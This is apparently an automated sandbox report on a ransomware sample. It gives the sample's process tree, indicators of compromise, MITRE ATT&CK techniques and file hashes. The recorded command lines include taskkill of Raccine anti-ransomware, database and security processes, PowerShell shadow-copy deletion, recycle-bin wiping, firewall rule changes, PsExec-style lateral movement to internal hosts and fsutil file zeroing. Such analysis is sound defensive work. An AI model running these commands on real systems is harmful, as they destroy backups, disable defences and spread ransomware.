Token: SeDebugPrivilege	4136	taskkill.exe
Token: SeDebugPrivilege	4244	taskkill.exe
Token: SeDebugPrivilege	4232	taskkill.exe
Token: SeDebugPrivilege	4268	taskkill.exe
Token: SeDebugPrivilege	4388	taskkill.exe
Token: SeDebugPrivilege	4444	taskkill.exe
Token: SeDebugPrivilege	4476	taskkill.exe
Token: SeDebugPrivilege	4520	taskkill.exe
Token: SeDebugPrivilege	4600	taskkill.exe
Token: SeDebugPrivilege	4640	taskkill.exe
Token: SeDebugPrivilege	4672	taskkill.exe
Token: SeDebugPrivilege	4756	taskkill.exe
Token: SeDebugPrivilege	4848	taskkill.exe
Token: SeDebugPrivilege	4868	taskkill.exe
Token: SeDebugPrivilege	4904	taskkill.exe
Token: SeDebugPrivilege	5004	taskkill.exe
Token: SeDebugPrivilege	5056	taskkill.exe
Token: SeDebugPrivilege	5108	taskkill.exe
Token: SeDebugPrivilege	2204	taskkill.exe
Token: SeDebugPrivilege	4196	taskkill.exe
Token: SeDebugPrivilege	4120	taskkill.exe
Token: SeDebugPrivilege	4044	taskkill.exe
Token: SeDebugPrivilege	1048	taskkill.exe
Token: SeDebugPrivilege	4224	taskkill.exe
Token: SeDebugPrivilege	4452	taskkill.exe
Token: SeDebugPrivilege	4272	taskkill.exe
Token: SeDebugPrivilege	4540	taskkill.exe
Token: SeDebugPrivilege	4472	taskkill.exe
Token: SeDebugPrivilege	4588	taskkill.exe
Token: SeDebugPrivilege	4680	taskkill.exe
Token: SeDebugPrivilege	4604	taskkill.exe
Token: SeDebugPrivilege	4740	taskkill.exe
Token: SeDebugPrivilege	4856	taskkill.exe
Token: SeDebugPrivilege	4676	taskkill.exe
Token: SeDebugPrivilege	4768	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

iexplore.exeSvchost.exe

pid process

2444 iexplore.exe
4032 Svchost.exe
4032 Svchost.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

2444 iexplore.exe
2444 iexplore.exe
204 IEXPLORE.EXE
204 IEXPLORE.EXE
204 IEXPLORE.EXE
204 IEXPLORE.EXE

pid	process
2444	iexplore.exe
4032	Svchost.exe
4032	Svchost.exe

pid	process
2444	iexplore.exe
2444	iexplore.exe
204	IEXPLORE.EXE
204	IEXPLORE.EXE
204	IEXPLORE.EXE
204	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117.exea906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exeDesktopLayer.exeiexplore.exePSEXESVC.exeSvchost.exe

description	pid	process	target process
PID 3876 wrote to memory of 1796	3876	a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117.exe	a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exe
PID 3876 wrote to memory of 1796	3876	a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117.exe	a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exe
PID 3876 wrote to memory of 1796	3876	a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117.exe	a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exe
PID 1796 wrote to memory of 2140	1796	a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exe	DesktopLayer.exe
PID 1796 wrote to memory of 2140	1796	a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exe	DesktopLayer.exe
PID 1796 wrote to memory of 2140	1796	a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exe	DesktopLayer.exe
PID 2140 wrote to memory of 2444	2140	DesktopLayer.exe	iexplore.exe
PID 2140 wrote to memory of 2444	2140	DesktopLayer.exe	iexplore.exe
PID 2444 wrote to memory of 204	2444	iexplore.exe	IEXPLORE.EXE
PID 2444 wrote to memory of 204	2444	iexplore.exe	IEXPLORE.EXE
PID 2444 wrote to memory of 204	2444	iexplore.exe	IEXPLORE.EXE
PID 2352 wrote to memory of 4032	2352	PSEXESVC.exe	Svchost.exe
PID 2352 wrote to memory of 4032	2352	PSEXESVC.exe	Svchost.exe
PID 4032 wrote to memory of 3724	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 3724	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 1060	4032	Svchost.exe	reg.exe
PID 4032 wrote to memory of 1060	4032	Svchost.exe	reg.exe
PID 4032 wrote to memory of 3748	4032	Svchost.exe	reg.exe
PID 4032 wrote to memory of 3748	4032	Svchost.exe	reg.exe
PID 4032 wrote to memory of 2296	4032	Svchost.exe	schtasks.exe
PID 4032 wrote to memory of 2296	4032	Svchost.exe	schtasks.exe
PID 4032 wrote to memory of 860	4032	Svchost.exe	sc.exe
PID 4032 wrote to memory of 860	4032	Svchost.exe	sc.exe
PID 4032 wrote to memory of 396	4032	Svchost.exe	netsh.exe
PID 4032 wrote to memory of 396	4032	Svchost.exe	netsh.exe
PID 4032 wrote to memory of 3488	4032	Svchost.exe	sc.exe
PID 4032 wrote to memory of 3488	4032	Svchost.exe	sc.exe
PID 4032 wrote to memory of 2180	4032	Svchost.exe	sc.exe
PID 4032 wrote to memory of 2180	4032	Svchost.exe	sc.exe
PID 4032 wrote to memory of 3952	4032	Svchost.exe	sc.exe
PID 4032 wrote to memory of 3952	4032	Svchost.exe	sc.exe
PID 4032 wrote to memory of 3688	4032	Svchost.exe	sc.exe
PID 4032 wrote to memory of 3688	4032	Svchost.exe	sc.exe
PID 4032 wrote to memory of 792	4032	Svchost.exe	sc.exe
PID 4032 wrote to memory of 792	4032	Svchost.exe	sc.exe
PID 4032 wrote to memory of 2256	4032	Svchost.exe	sc.exe
PID 4032 wrote to memory of 2256	4032	Svchost.exe	sc.exe
PID 4032 wrote to memory of 1432	4032	Svchost.exe	sc.exe
PID 4032 wrote to memory of 1432	4032	Svchost.exe	sc.exe
PID 4032 wrote to memory of 3992	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 3992	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 1004	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 1004	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 2080	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 2080	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 1704	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 1704	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 3712	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 3712	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 2808	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 2808	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 3196	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 3196	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 3000	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 3000	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 3652	4032	Svchost.exe	netsh.exe
PID 4032 wrote to memory of 3652	4032	Svchost.exe	netsh.exe
PID 4032 wrote to memory of 3608	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 3608	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 3660	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 3660	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 3024	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 3024	4032	Svchost.exe	taskkill.exe
PID 4032 wrote to memory of 3544	4032	Svchost.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117.exe
"C:\Users\Admin\AppData\Local\Temp\a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3876
- C:\Users\Admin\AppData\Local\Temp\a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exe
  C:\Users\Admin\AppData\Local\Temp\a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:1796
- - C:\Program Files (x86)\Microsoft\DesktopLayer.exe
    "C:\Program Files (x86)\Microsoft\DesktopLayer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2140
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe"
      4⤵
      Modifies Internet Explorer settings
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2444
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2444 CREDAT:82945 /prefetch:2
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:204

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2352
- C:\Windows\Svchost.exe
  "Svchost.exe"
  2⤵
  - Modifies extensions of user files
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:4032
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3724
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:1060
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:3748
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:2296
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:860
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    - Modifies data under HKEY_USERS
    PID:396
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:3488
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:2180
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:3952
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:3688
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:792
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:2256
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:1432
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3992
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1004
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2080
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1704
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3712
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2808
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3196
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3000
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    - Modifies data under HKEY_USERS
    PID:3652
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3608
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3660
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3024
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3544
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4136
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:4188
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4232
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4268
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4244
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4388
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4444
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4476
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4520
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4600
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4640
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4672
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4756
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    - Kills process with taskkill
    PID:4792
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4848
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4868
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4904
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5004
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5056
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5108
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2204
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4196
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4120
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4044
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1048
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4224
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4452
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4272
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4540
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4472
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4588
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4680
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4604
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4740
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4856
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4676
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:4768
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:5072
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    - Modifies data under HKEY_USERS
    PID:2564
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    - Modifies data under HKEY_USERS
    PID:4124
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:4296
- - C:\Windows\TEMP\eeyel4zk.exe
    "C:\Windows\TEMP\eeyel4zk.exe" \\10.10.0.34 -d -h -s -f -accepteula -nobanner -c "C:\Windows\Svchost.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4536
- - C:\Windows\TEMP\eeyel4zk.exe
    "C:\Windows\TEMP\eeyel4zk.exe" \\10.10.0.13 -d -h -s -f -accepteula -nobanner -c "C:\Windows\Svchost.exe"
    3⤵
    - Executes dropped EXE
    PID:4596
- - C:\Windows\TEMP\eeyel4zk.exe
    "C:\Windows\TEMP\eeyel4zk.exe" \\10.10.0.10 -d -h -s -f -accepteula -nobanner -c "C:\Windows\Svchost.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4608
- - C:\Windows\TEMP\eeyel4zk.exe
    "C:\Windows\TEMP\eeyel4zk.exe" \\10.10.0.22 -d -h -s -f -accepteula -nobanner -c "C:\Windows\Svchost.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4636
- - C:\Windows\TEMP\eeyel4zk.exe
    "C:\Windows\TEMP\eeyel4zk.exe" \\10.10.0.32 -d -h -s -f -accepteula -nobanner -c "C:\Windows\Svchost.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4844
- - C:\Windows\System32\mshta.exe
    "C:\Windows\System32\mshta.exe" \RESTORE_FILES_INFO.hta
    3⤵
    - Modifies data under HKEY_USERS
    PID:4760
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
    3⤵
    PID:4836
  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.7 -n 3
      4⤵
      Runs ping.exe
      PID:4820
  - - C:\Windows\system32\fsutil.exe
      fsutil file setZeroData offset=0 length=524288 “%s”
      4⤵
      Drops file in System32 directory
      PID:2080
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Svchost.exe
    3⤵
    PID:4672
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 3
      4⤵
      PID:1704

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft\DesktopLayer.exe

MD5
ff5e1f27193ce51eec318714ef038bef

SHA1
b4fa74a6f4dab3a7ba702b6c8c129f889db32ca6

SHA256
fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320

SHA512
c9d654ead35f40eea484a3dc5b5d0a44294b9e7b41a9bacdafdd463d3de9daa2a43237a5f113f6a9c8ea5e1366823fd3d83da18cd8197aa69a55e9f345512a7a

Download Submit
C:\Program Files (x86)\Microsoft\DesktopLayer.exe

MD5
ff5e1f27193ce51eec318714ef038bef

SHA1
b4fa74a6f4dab3a7ba702b6c8c129f889db32ca6

SHA256
fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320

SHA512
c9d654ead35f40eea484a3dc5b5d0a44294b9e7b41a9bacdafdd463d3de9daa2a43237a5f113f6a9c8ea5e1366823fd3d83da18cd8197aa69a55e9f345512a7a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

MD5
06165dea77d5d10217992bd74f065006

SHA1
964d97611d8050aaf7d8a3a5e641cd20df6afd92

SHA256
9b125647f3ede14fa37214fe956f3b906f8bf58510bdc1eecfdf2ca4c827fe8f

SHA512
e126e1fdd45d2b08c37724b568a1ee9eef95895f2c31f5626186032293eb7f2a62f907fea96f1f0fca4c7de3cd9bac45df28bb69d42b2cd7ea5468e1aefdfee2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

MD5
09045c7ded0f5cdcfd0ca3d7f417630c

SHA1
5242239d2442abf1342975f9d1ba61b535ba52a3

SHA256
3329f4416c8348894f1a7cac969e902c9dafb22f5313a50ffe63d0b3955e326a

SHA512
b9784aba04b9cdcf08fbfe4d5b83ee6e33dd58b6005520f263f3034156f966c4ac2ca2f5d2664ca615d832331f0dc192c691b3f3e298e747c3145bdd695f2c9a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\167NLFYH.cookie

MD5
371937e9b01d2ee139fe1e2f54931310

SHA1
f3951e209b6a6f0783ae15202a3eefd1b9335326

SHA256
8a1a23ebefa8b25faaea930ffbee510eb5c239bb002b0443c5dde0dc91c3d10d

SHA512
cfa492142fa1adf76db0d423af78f1170cb96e0644f95a619dcf26b9baecef61222e2a0f0d7a358b23f25991c79c20c6bdd867639d5d591c347c670a22dee048

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\2ALH9QAL.cookie

MD5
f130b9dd7d680a5c17f03968213c5a31

SHA1
150a2377c13754bc16fca80e7c10421617baa03f

SHA256
8d4cb9f09f5b06ef70eb03da581e3159ca43bcf0d9c329d0fb4c31c8ca01ddfa

SHA512
9f125f9a0377ff02beb2f6fb178aed4455300e6520c6141fdda13bb662d0f934d8f11dcdfb1c996a0aaec2ae61c448a922a6b293b0909a6a92ee6337b2c2635e

Download Submit
C:\Users\Admin\AppData\Local\Temp\a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exe

MD5
ff5e1f27193ce51eec318714ef038bef

SHA1
b4fa74a6f4dab3a7ba702b6c8c129f889db32ca6

SHA256
fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320

SHA512
c9d654ead35f40eea484a3dc5b5d0a44294b9e7b41a9bacdafdd463d3de9daa2a43237a5f113f6a9c8ea5e1366823fd3d83da18cd8197aa69a55e9f345512a7a

Download Submit
C:\Users\Admin\AppData\Local\Temp\a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exe

MD5
ff5e1f27193ce51eec318714ef038bef

SHA1
b4fa74a6f4dab3a7ba702b6c8c129f889db32ca6

SHA256
fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320

SHA512
c9d654ead35f40eea484a3dc5b5d0a44294b9e7b41a9bacdafdd463d3de9daa2a43237a5f113f6a9c8ea5e1366823fd3d83da18cd8197aa69a55e9f345512a7a

Download Submit
C:\Windows\TEMP\eeyel4zk.exe

MD5
6f47970bd915ab3d24f0cf5a24223718

SHA1
791ba6733e718d5289b5e7e13d13efb93ec5033f

SHA256
2c5817a56e387283e450cf2abeb4c3e97bd53de135219325c104058c533f6b60

SHA512
fdd894c26079854ee4d02e906bea472b49484cd4293a33edbe6c4c091473ef1ddbeb09669625166a36218501a35467a2013b59e44ee20cbc31050836e89640ac

Download Submit
C:\Windows\Temp\eeyel4zk.exe

MD5
6f47970bd915ab3d24f0cf5a24223718

SHA1
791ba6733e718d5289b5e7e13d13efb93ec5033f

SHA256
2c5817a56e387283e450cf2abeb4c3e97bd53de135219325c104058c533f6b60

SHA512
fdd894c26079854ee4d02e906bea472b49484cd4293a33edbe6c4c091473ef1ddbeb09669625166a36218501a35467a2013b59e44ee20cbc31050836e89640ac

Download Submit
C:\Windows\Temp\eeyel4zk.exe

MD5
6f47970bd915ab3d24f0cf5a24223718

SHA1
791ba6733e718d5289b5e7e13d13efb93ec5033f

SHA256
2c5817a56e387283e450cf2abeb4c3e97bd53de135219325c104058c533f6b60

SHA512
fdd894c26079854ee4d02e906bea472b49484cd4293a33edbe6c4c091473ef1ddbeb09669625166a36218501a35467a2013b59e44ee20cbc31050836e89640ac

Download Submit
C:\Windows\Temp\eeyel4zk.exe

MD5
6f47970bd915ab3d24f0cf5a24223718

SHA1
791ba6733e718d5289b5e7e13d13efb93ec5033f

SHA256
2c5817a56e387283e450cf2abeb4c3e97bd53de135219325c104058c533f6b60

SHA512
fdd894c26079854ee4d02e906bea472b49484cd4293a33edbe6c4c091473ef1ddbeb09669625166a36218501a35467a2013b59e44ee20cbc31050836e89640ac

Download Submit
C:\Windows\Temp\eeyel4zk.exe

MD5
6f47970bd915ab3d24f0cf5a24223718

